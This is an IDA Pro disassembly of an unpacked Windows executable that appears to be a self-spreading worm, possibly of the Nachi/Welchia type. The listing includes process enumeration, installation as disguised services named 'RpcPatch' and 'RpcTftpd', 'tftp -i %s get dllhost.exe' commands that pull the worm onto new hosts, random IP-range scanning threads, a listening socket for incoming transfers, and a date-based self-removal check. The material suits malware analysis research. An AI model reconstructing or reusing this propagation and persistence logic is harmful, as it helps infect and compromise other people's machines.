;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 543EBB463C64C6D04CAD5A4B2D381985
; File Name : u:\work\543ebb463c64c6d04cad5a4b2d381985_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_402A00+D�p
; DATA XREF: sub_40A38C+13D�r ...
var_230 = dword ptr -230h
var_22C = byte ptr -22Ch
var_228 = dword ptr -228h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
sub esp, 230h
loc_401006: ; DATA XREF: seg002:0040A2BF�o
push ebp
push esi
push edi
mov ecx, 41h
xor eax, eax
lea edi, [esp+23Ch+var_107]
mov [esp+23Ch+var_108], 0
lea edx, [esp+23Ch+var_108]
rep stosd
mov edi, [esp+23Ch+arg_0]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov [esp+23Ch+var_230], 0
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push eax
rep movsb
mov ecx, 49h
lea edi, [esp+240h+var_22C]
rep stosd
push 2
call sub_403134 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4010E7
lea ecx, [esp+23Ch+var_230]
mov [esp+23Ch+var_230], 128h
push ecx
push edi
call sub_40312E ; Process32First
test eax, eax
jz short loc_4010E0
mov esi, dword_404120
mov ebp, dword_404140
loc_401091: ; CODE XREF: sub_401000+C9�j
lea edx, [esp+23Ch+var_20C]
push 2Eh
push edx
call esi ; dword_404120
add esp, 8
test eax, eax
jz short loc_4010A4
mov byte ptr [eax], 0
loc_4010A4: ; CODE XREF: sub_401000+9F�j
lea eax, [esp+23Ch+var_108]
lea ecx, [esp+23Ch+var_20C]
push eax
push ecx
call ebp ; dword_404140
add esp, 8
test eax, eax
jz short loc_4010CB
lea edx, [esp+23Ch+var_230]
push edx
push edi
call sub_403128 ; Process32Next
test eax, eax
jz short loc_4010E0
jmp short loc_401091
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401000+B8�j
push edi
call dword_4040E0 ; CloseHandle
mov eax, [esp+23Ch+var_228]
pop edi
pop esi
pop ebp
add esp, 230h
retn
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401000+83�j
; sub_401000+C7�j
push edi
call dword_4040E0 ; CloseHandle
loc_4010E7: ; CODE XREF: sub_401000+6C�j
pop edi
pop esi
xor eax, eax
pop ebp
add esp, 230h
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401100 proc near ; CODE XREF: sub_401470+38�p
var_2 = byte ptr -2
var_1 = byte ptr -1
push ecx
push ebx
push esi
mov esi, dword_40413C
call esi ; dword_40413C
cdq
mov ecx, 11h
idiv ecx
cmp edx, 0Eh
jnz short loc_40112E
call esi ; dword_40413C
mov ebx, eax
and ebx, 80000003h
jns short loc_401129
dec ebx
or ebx, 0FFFFFFFCh
inc ebx
loc_401129: ; CODE XREF: sub_401100+22�j
add bl, 3Fh
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40112E: ; CODE XREF: sub_401100+16�j
cmp edx, 0Fh
jnz short loc_401144
call esi ; dword_40413C
cdq
mov ecx, 2Dh
idiv ecx
mov ebx, edx
add bl, 80h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_401144: ; CODE XREF: sub_401100+31�j
cmp edx, 10h
jnz short loc_40115A
call esi ; dword_40413C
cdq
mov ecx, 9
idiv ecx
mov ebx, edx
sub bl, 40h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40115A: ; CODE XREF: sub_401100+47�j
mov bl, byte_405BA4[edx]
loc_401160: ; CODE XREF: sub_401100+2C�j
; sub_401100+42�j ...
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401170
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401170: ; CODE XREF: sub_401100+67�j
mov [esp+0Ch+var_2], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401184
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401184: ; CODE XREF: sub_401100+7B�j
mov [esp+0Ch+var_1], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401198
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401198: ; CODE XREF: sub_401100+8F�j
xor edx, edx
xor ecx, ecx
mov ch, [esp+0Ch+var_1]
mov dh, bl
mov dl, [esp+0Ch+var_2]
and eax, 0FFh
shl edx, 10h
or eax, edx
and ecx, 0FFFFh
pop esi
or eax, ecx
pop ebx
pop ecx
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: seg000:004030AA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_4040CC ; FreeConsole
call sub_4027B0
test eax, eax
jnz short locret_4011FB
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call dword_4040D0 ; GetSystemDirectoryA
call sub_402730
sub eax, 2
jz short loc_4011FC
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_4016D0
add esp, 8
locret_4011FB: ; CODE XREF: sub_4011C0+D�j
retn
; ---------------------------------------------------------------------------
loc_4011FC: ; CODE XREF: sub_4011C0+27�j
jmp sub_4027E0
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401280+AF�p
; sub_401280:loc_4013B1�p ...
push esi
mov esi, dword_4040C8
loc_401217: ; CODE XREF: sub_401210+27�j
call sub_401E80
test eax, eax
jnz short loc_401230
loc_401220: ; CODE XREF: sub_401210+1E�j
push 927C0h
call esi ; dword_4040C8
call sub_401E80
test eax, eax
jz short loc_401220
loc_401230: ; CODE XREF: sub_401210+E�j
call sub_401EA0
test eax, eax
jz short loc_401217
mov esi, dword_40411C
push offset dword_407478
push offset aTftpISGetDllho ; "tftp -i %s get dllhost.exe wins\\DLLHOST"...
push offset dword_4075A8
call esi ; dword_40411C
add esp, 0Ch
push offset dword_407478
push offset aTftpISGetSvcho ; "tftp -i %s get svchost.exe wins\\SVCHOST"...
push offset dword_407628
call esi ; dword_40411C
add esp, 0Ch
call sub_4020E0
call sub_402130
pop esi
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401280 proc near ; CODE XREF: sub_4016D0+A�j
; seg000:0040294F�p
var_1A0 = word ptr -1A0h
var_194 = byte ptr -194h
var_190 = byte ptr -190h
sub esp, 1A4h
lea eax, [esp+1A4h+var_190]
push eax
push 202h
call dword_40418C ; WSAStartup
test eax, eax
jnz loc_401359
call sub_402A00
lea ecx, [esp+1A4h+var_1A0]
push ecx
call dword_4040B8 ; GetLocalTime
cmp [esp+1A4h+var_1A0], 7D4h
jnz short loc_4012DB
push offset aRpcpatch ; "RpcPatch"
call sub_402F00
push offset aRpctftpd ; "RpcTftpd"
call sub_402F00
add esp, 8
call sub_402970
push 1
call dword_4040BC ; ExitProcess
loc_4012DB: ; CODE XREF: sub_401280+35�j
push ebx
push ebp
push esi
push edi
call dword_4040C0 ; GetTickCount
push eax
call dword_404104 ; srand
mov esi, dword_4040C8
mov ecx, 10h
mov eax, 0AAAAAAAAh
mov edi, offset dword_406430
add esp, 4
rep stosd
loc_401306: ; CODE XREF: sub_401280+A3�j
push 109A0h
call sub_402FC0
add esp, 4
mov ds:dword_4075A0, eax
push 64h
call esi ; dword_4040C8
mov eax, ds:dword_4075A0
test eax, eax
jz short loc_401306
call sub_401F30
call sub_402170
call sub_401210
call sub_401780
lea edx, [esp+1A4h+var_194]
push edx
push 0
push 0
push offset sub_401990
push 0
push 0
call dword_4040C4 ; CreateThread
test eax, eax
jnz short loc_401360
pop edi
pop esi
pop ebp
pop ebx
loc_401359: ; CODE XREF: sub_401280+18�j
add esp, 1A4h
retn
; ---------------------------------------------------------------------------
loc_401360: ; CODE XREF: sub_401280+D3�j
push eax
call dword_4040E0 ; CloseHandle
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
test eax, eax
jnz short loc_401398
push 3E8h
call esi ; dword_4040C8
call sub_4015E0
push 3E8h
call esi ; dword_4040C8
push offset aRpctftpd ; "RpcTftpd"
call sub_402540
add esp, 4
loc_401398: ; CODE XREF: sub_401280+F6�j
push 7D0h
call esi ; dword_4040C8
mov ebx, dword_404190
mov ebp, dword_404194
mov edi, dword_40413C
loc_4013B1: ; CODE XREF: sub_401280+1DE�j
call sub_401210
push offset dword_407478
call ebp ; dword_404194
push eax
call ebx ; dword_404190
mov esi, eax
push 0
and esi, 0FFFF0000h
push 0
push 1
push esi
call sub_401470
add esp, 10h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_4013EA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4013EA: ; CODE XREF: sub_401280+163�j
jz short loc_4013F4
add esi, 10000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013F4: ; CODE XREF: sub_401280:loc_4013EA�j
sub esi, 30000h
loc_4013FA: ; CODE XREF: sub_401280+172�j
push 0
push 0
push 3
push esi
call sub_401470
call sub_401210
call edi ; dword_40413C
cdq
mov ecx, 4Ch
xor esi, esi
idiv ecx
push 1
push 0
push 1
mov si, word_40537C[edx*2]
shl esi, 10h
push esi
call sub_401470
add esp, 20h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_401444
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_401444: ; CODE XREF: sub_401280+1BD�j
jz short loc_40144A
push 0
jmp short loc_40144C
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401280:loc_401444�j
push 1
loc_40144C: ; CODE XREF: sub_401280+1C8�j
; DATA XREF: sub_40A38C+31B�r
push 1
push 1
push esi
call sub_401470
add esp, 10h
call sub_402A00
jmp loc_4013B1
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_401280+14F�p
; sub_401280+181�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_4040C8
push esi
mov esi, [esp+18h+arg_4]
push edi
shl esi, 10h
xor edi, edi
xor ebx, ebx
test esi, esi
mov [esp+1Ch+var_8], 1
mov [esp+1Ch+var_C], ebx
mov [esp+1Ch+var_4], esi
jle loc_4015C7
loc_4014A0: ; CODE XREF: sub_401470+151�j
mov eax, [esp+1Ch+arg_8]
test eax, eax
jz short loc_4014B1
call sub_401100
mov ebx, eax
jmp short loc_4014B7
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470+36�j
mov eax, [esp+1Ch+arg_0]
add ebx, eax
loc_4014B7: ; CODE XREF: sub_401470+3F�j
cmp bl, 0C5h
jz loc_4015B6
mov ecx, ebx
shr ecx, 8
cmp cl, 0C5h
jz loc_4015B6
mov eax, ebx
shr eax, 10h
cmp al, 0C5h
jz loc_4015B6
mov edx, ebx
shr edx, 18h
cmp dl, 0C5h
jz loc_4015B6
cmp bx, 9999h
jz loc_4015B6
cmp cx, 9999h
jz loc_4015B6
cmp ax, 9999h
jz loc_4015B6
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40152D
push 64h
call ebp ; dword_4040C8
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jz short loc_401575
loc_40152D: ; CODE XREF: sub_401470+A7�j
test edi, edi
jz short loc_401538
push edi
call dword_4040E0 ; CloseHandle
loc_401538: ; CODE XREF: sub_401470+BF�j
push ebx
call dword_404188 ; ntohl
mov [esi], eax
mov eax, [esp+1Ch+arg_C]
test eax, eax
jz short loc_401558
lea eax, [esp+1Ch+arg_4]
push eax
push 0
push esi
push offset sub_402C40
jmp short loc_401565
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401470+D7�j
lea ecx, [esp+1Ch+arg_4]
push ecx
push 0
push esi
push offset sub_402B20
loc_401565: ; CODE XREF: sub_401470+E6�j
push 0
push 0
call dword_4040C4 ; CreateThread
push 2
mov edi, eax
call ebp ; dword_4040C8
loc_401575: ; CODE XREF: sub_401470+BB�j
mov eax, [esp+1Ch+var_8]
test eax, eax
jz short loc_401596
cmp [esp+1Ch+var_C], 12Ch
jl short loc_401596
push 7D0h
call ebp ; dword_4040C8
mov [esp+1Ch+var_8], 0
loc_401596: ; CODE XREF: sub_401470+10B�j
; sub_401470+115�j
cmp ds:dword_4075A4, 12Ch
jl short loc_4015B2
loc_4015A2: ; CODE XREF: sub_401470+140�j
push 2
call ebp ; dword_4040C8
cmp ds:dword_4075A4, 12Ch
jge short loc_4015A2
loc_4015B2: ; CODE XREF: sub_401470+130�j
mov esi, [esp+1Ch+var_4]
loc_4015B6: ; CODE XREF: sub_401470+4A�j
; sub_401470+58�j ...
mov ebx, [esp+1Ch+var_C]
inc ebx
loc_4015BB: ; DATA XREF: sub_40A38C+F0�r
cmp ebx, esi
mov [esp+1Ch+var_C], ebx
jl loc_4014A0
loc_4015C7: ; CODE XREF: sub_401470+2A�j
push 0EA60h
call ebp ; dword_4040C8
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015E0 proc near ; CODE XREF: sub_401280+FF�p
; sub_4016D0�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
sub esp, 208h
lea eax, [esp+208h+var_104]
push esi
mov esi, dword_40411C
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSDllcacheTftpd ; "%s\\dllcache\\tftpd.exe"
push eax
call esi ; dword_40411C
add esp, 0Ch
lea ecx, [esp+20Ch+var_208]
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsSvchost_e ; "%s\\wins\\svchost.exe"
push ecx
call esi ; dword_40411C
add esp, 0Ch
lea edx, [esp+20Ch+var_208]
lea eax, [esp+20Ch+var_104]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aMsdtc ; "MSDTC"
push offset aSvchost_exe ; "svchost.exe"
push offset aNetworkConnect ; "Network Connections Sharing"
push offset aRpctftpd ; "RpcTftpd"
call sub_4023E0
add esp, 10h
pop esi
add esp, 208h
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401660 proc near ; CODE XREF: sub_4016D0+5�p
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
sub esp, 20Ch
lea eax, [esp+20Ch+var_108]
push 104h
push eax
push 0
call dword_4040A8 ; GetModuleFileNameA
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea ecx, [esp+210h+var_20C]
push offset aSWinsDllhost_e ; "%s\\wins\\DLLHOST.EXE"
push ecx
call dword_40411C ; sprintf
add esp, 0Ch
lea edx, [esp+20Ch+var_20C]
lea eax, [esp+20Ch+var_108]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aBrowser ; "Browser"
push offset aDllhost_exe ; "DLLHOST.EXE"
push offset aWinsClient ; "WINS Client"
push offset aRpcpatch ; "RpcPatch"
call sub_4023E0
add esp, 21Ch
retn
sub_401660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016D0 proc near ; CODE XREF: sub_4011C0+33�p
call sub_4015E0
call sub_401660
jmp sub_401280
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_401780:loc_4018BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
push 0
push 0
push eax
push ecx
push 0
call sub_403110
neg eax
sbb eax, eax
inc eax
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_401780+16D�p
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
arg_0 = dword ptr 4
sub esp, 54h
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+58h+var_44]
rep stosd
lea ecx, [esp+58h+var_54]
lea edx, [esp+58h+var_44]
push ecx
mov ecx, [esp+5Ch+arg_0]
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
mov [esp+80h+var_44], 44h
mov [esp+80h+var_40], eax
mov [esp+80h+var_38], eax
mov [esp+80h+var_3C], eax
mov [esp+80h+var_28], eax
mov [esp+80h+var_2C], eax
mov [esp+80h+var_30], eax
mov [esp+80h+var_34], eax
mov [esp+80h+var_14], ax
mov [esp+80h+var_10], eax
mov [esp+80h+var_12], ax
mov [esp+80h+var_18], 1
call dword_4040E4 ; CreateProcessA
mov ecx, [esp+58h+var_54]
pop edi
neg eax
sbb eax, eax
and eax, ecx
add esp, 54h
retn
sub_401700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401780 proc near ; CODE XREF: sub_401280+B4�p
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_B6 = byte ptr -0B6h
var_B4 = byte ptr -0B4h
sub esp, 0C8h
push esi
push edi
call sub_402310
mov edi, eax
test edi, edi
jz short loc_40179C
cmp edi, 1
jnz loc_4018C8
loc_40179C: ; CODE XREF: sub_401780+11�j
push edi
call sub_402390
add esp, 4
test eax, eax
jnz loc_4018C8
call dword_4040A0 ; GetOEMCP
mov esi, eax
call dword_4040A4 ; GetSystemDefaultLCID
mov ecx, eax
and ecx, 3FFh
shr ax, 0Ah
cmp esi, 1B5h
jnz short loc_4017E7
cmp cx, 9
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
xor eax, eax
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_4017E7: ; CODE XREF: sub_401780+4D�j
cmp esi, 3A8h
jnz short loc_40180A
cmp cx, 4
jnz loc_40192F
cmp ax, 2
jnz loc_40192F
mov eax, 1
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40180A: ; CODE XREF: sub_401780+6D�j
cmp esi, 3B6h
jnz short loc_40182D
cmp cx, 4
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 2
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401780+90�j
cmp esi, 3A4h
jz loc_40192F
cmp esi, 3B5h
jnz loc_40192F
cmp cx, 12h
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 3
loc_40185E: ; CODE XREF: sub_401780+65�j
; sub_401780+88�j ...
mov ecx, dword_4061A8
mov edx, dword_4061AC
mov [esp+0D0h+var_C8], ecx
mov ecx, dword_4061B0
mov [esp+0D0h+var_C4], edx
mov edx, dword_4061B4
mov [esp+0D0h+var_C0], ecx
mov cx, word_4061B8
mov [esp+0D0h+var_BC], edx
mov dl, byte_4061BA
test edi, edi
mov [esp+0D0h+var_B8], cx
mov [esp+0D0h+var_B6], dl
jnz short loc_4018AF
mov eax, off_405424[eax*4]
lea ecx, [esp+0D0h+var_C8]
push eax
push ecx
jmp short loc_4018BC
; ---------------------------------------------------------------------------
loc_4018AF: ; CODE XREF: sub_401780+11E�j
mov edx, off_405414[eax*4]
lea eax, [esp+0D0h+var_C8]
push edx
push eax
loc_4018BC: ; CODE XREF: sub_401780+12D�j
call sub_4016E0
add esp, 8
test eax, eax
jnz short loc_4018D3
loc_4018C8: ; CODE XREF: sub_401780+16�j
; sub_401780+27�j
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401780+146�j
lea ecx, [esp+0D0h+var_C8]
lea edx, [esp+0D0h+var_B4]
push ecx
loc_4018DC: ; DATA XREF: seg002:0040A6B1�o
push offset aSNOZQ ; "%s -n -o -z -q"
push edx
call dword_40411C ; sprintf
lea eax, [esp+0DCh+var_B4]
push eax
call sub_401700
mov esi, eax
add esp, 10h
test esi, esi
jnz short loc_401904
pop edi
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_401904: ; CODE XREF: sub_401780+179�j
push 57E40h
push esi
call dword_4040B0 ; WaitForSingleObject
test eax, eax
jz short loc_40193A
push 1
push esi
call dword_4040AC ; TerminateProcess
push esi
call dword_4040E0 ; CloseHandle
lea ecx, [esp+0D0h+var_C8]
push ecx
call dword_4040E8 ; DeleteFileA
loc_40192F: ; CODE XREF: sub_401780+53�j
; sub_401780+5D�j ...
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401780+192�j
push esi
call dword_4040E0 ; CloseHandle
mov esi, dword_4040C8
push 3A98h
call esi ; dword_4040C8
lea edx, [esp+0D0h+var_C8]
push edx
call dword_4040E8 ; DeleteFileA
push edi
call sub_402390
add esp, 4
test eax, eax
jz short loc_401977
push 2
call sub_4022A0
add esp, 4
push 4E20h
call esi ; dword_4040C8
loc_401977: ; CODE XREF: sub_401780+1E4�j
pop edi
mov eax, 1
pop esi
add esp, 0C8h
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401990 proc near ; DATA XREF: sub_401280+C2�o
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
sub esp, 28h
push ebx
push ebp
push esi
push edi
push 0
push 1
push 2
call dword_404150 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401AFA
push 0
call dword_404188 ; ntohl
mov [esp+38h+var_20], 2
mov [esp+38h+var_1C], eax
call dword_40413C ; rand
cdq
mov ecx, 64h
mov ebx, dword_404174
idiv ecx
mov ebp, dword_404178
add edx, 29Ah
xor esi, esi
loc_4019E3: ; CODE XREF: sub_401990+8F�j
add dx, si
xor eax, eax
mov al, dh
mov word_405B68, dx
cmp al, 0C5h
jz short loc_401A18
cmp dl, 0C5h
jz short loc_401A18
push edx
call ebx ; dword_404174
lea ecx, [esp+38h+var_20]
push 10h
push ecx
push edi
mov [esp+44h+var_1E], ax
call ebp ; dword_404178
cmp eax, 0FFFFFFFFh
jnz short loc_401A21
mov dx, word_405B68
loc_401A18: ; CODE XREF: sub_401990+63�j
; sub_401990+68�j
inc esi
cmp esi, 3E8h
jl short loc_4019E3
loc_401A21: ; CODE XREF: sub_401990+7F�j
cmp esi, 3E8h
jnz short loc_401A37
call dword_40417C ; WSACleanup
push 1
call dword_4040BC ; ExitProcess
loc_401A37: ; CODE XREF: sub_401990+97�j
push 7D0h
push edi
loc_401A3D: ; DATA XREF: seg002:0040A4F0�r
call dword_404180 ; listen
cmp eax, 0FFFFFFFFh
jz loc_401AF3
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
mov [esp+44h+var_28], 10h
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401AF3
mov ebp, dword_4040C8
mov ebx, dword_4040C4
loc_401A7C: ; CODE XREF: sub_401990+142�j
push 4
call sub_402FC0
add esp, 4
test eax, eax
jnz short loc_401A9C
push 0Ah
call ebp ; dword_4040C8
push 4
call sub_402FC0
add esp, 4
test eax, eax
jz short loc_401ABC
loc_401A9C: ; CODE XREF: sub_401990+F8�j
lea ecx, [esp+38h+var_24]
mov [eax], esi
push ecx
push 0
push eax
push offset sub_401C80
push 0
push 0
call ebx ; dword_4040C4
test eax, eax
jz short loc_401AE7
push eax
call dword_4040E0 ; CloseHandle
loc_401ABC: ; CODE XREF: sub_401990+10A�j
lea edx, [esp+38h+var_28]
lea eax, [esp+38h+var_10]
push edx
push eax
push edi
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401A7C
push edi
call dword_404170 ; closesocket
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
; ---------------------------------------------------------------------------
loc_401AE7: ; CODE XREF: sub_401990+123�j
cmp esi, 0FFFFFFFFh
jz short loc_401AF3
push esi
call dword_404170 ; closesocket
loc_401AF3: ; CODE XREF: sub_401990+B6�j
; sub_401990+DA�j ...
push edi
call dword_404170 ; closesocket
loc_401AFA: ; CODE XREF: sub_401990+18�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B10 proc near ; CODE XREF: sub_401C80+D8�p
; sub_401C80+121�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [esp+10h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push edi
call dword_404168 ; send
test eax, eax
jnz short loc_401B3C
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; CODE XREF: sub_401B10+25�j
mov esi, [esp+10h+arg_8]
mov ebx, dword_40416C
push 0
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_401B7E
mov ebp, dword_404100
loc_401B5C: ; CODE XREF: sub_401B10+6C�j
push offset dword_4061BC
push esi
mov byte ptr [eax+esi], 0
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401B85
push eax
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jnz short loc_401B5C
loc_401B7E: ; CODE XREF: sub_401B10+44�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401B10+5D�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
sub_401B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B90 proc near ; CODE XREF: sub_401C80+162�p
; sub_401C80+192�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_4]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov esi, [esp+14h+arg_0]
push 0
not ecx
dec ecx
push ecx
push edx
push esi
call dword_404168 ; send
test eax, eax
jz loc_401C64
lea eax, [esp+14h+var_4]
push 4
push eax
push 1006h
push 0FFFFh
push esi
mov [esp+28h+var_4], 15F90h
call dword_404164 ; setsockopt
mov ebx, dword_4040C0
call ebx ; dword_4040C0
mov edi, [esp+14h+arg_8]
push 0
push 1FFh
push edi
push esi
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_4]
mov ebp, eax
sub ebp, ecx
cmp esi, 0FFFFFFFFh
jz short loc_401C64
loc_401C0C: ; CODE XREF: sub_401B90+D2�j
mov byte ptr [esi+edi], 0
mov esi, dword_404100
push offset aTransferSucces ; "Transfer successful"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C6C
push offset aTimeoutOccurre ; "Timeout occurred"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C64
cmp ebp, 15F2Ch
ja short loc_401C64
call ebx ; dword_4040C0
mov ecx, [esp+14h+arg_0]
push 0
push 1FFh
push edi
push ecx
mov [esp+24h+arg_4], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
sub eax, [esp+14h+arg_4]
add ebp, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401C0C
loc_401C64: ; CODE XREF: sub_401B90+26�j
; sub_401B90+7A�j ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
